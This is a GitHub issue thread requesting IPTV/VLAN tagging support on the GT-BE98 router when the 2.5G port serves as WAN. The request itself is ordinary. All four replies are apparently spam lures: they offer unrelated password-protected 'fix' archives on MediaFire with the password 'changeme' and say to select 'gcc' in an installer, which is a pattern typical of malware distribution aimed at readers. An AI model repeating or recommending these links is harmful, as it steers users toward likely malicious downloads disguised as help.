gnuton/asuswrt-merlin.ng #665: Support IPTV / Special ISP requirement (VLAN tagging) when 2.5G WAN port is selected as primary on GT-BE98

ignaciobfp, 2024-08-26:
**Is your feature request related to a problem? Please describe.**
Asked Asus to fix this on their part, but received no response apart from "We will look into it" about 2 months ago. My problem is that I wanted to use this router to remove an existing 10G switch in my local network, so I need both 10G ports as LAN ports. On the current status this is not possible.

In the latest firmware they even included a Pop-up confirming this limitation:
[image]
The translation from spanish is roughly "Configuring 2.5G WAN/LAN1 as WAN will disable the "IPTV" function. Would you like to continue?

Of course it does not work. For me only the internet traffic (VLAN 6 on my ISP) would be sufficient, not interested in the rest.

**Describe the solution you'd like**
If possible, I would like to see a proper implementation when a different WAN port is selected. Ideally, this should work also for dual WAN and IPTV/phone section, but any workaround for this, even a "manual" one would be very welcome on my part.

**Describe alternatives you've considered**
Only solution I can think of is putting an old router between my ONT and the asus router, just for the VLAN tagging. This is a bad solution because 1) This is a perfect example of "using a sledgehammer to crack a nut." 2) I do not want unnecessary power consumption if avoidable.

I also could add a 10G switch to my LAN, but they are expensive, and points 1) and 2) remain an issue.

**Additional context**
I hope this is doable in software, and not too cumbersome. Sadly, I expected a decent experience "out of the box" until the router is fully supported on a release version, but I were wrong I suppose. I apologize in advance for asking for improvements that should be done by the OEM.

itbear-shu, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

youngerwarrior, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

scppuna, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

scppuna, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."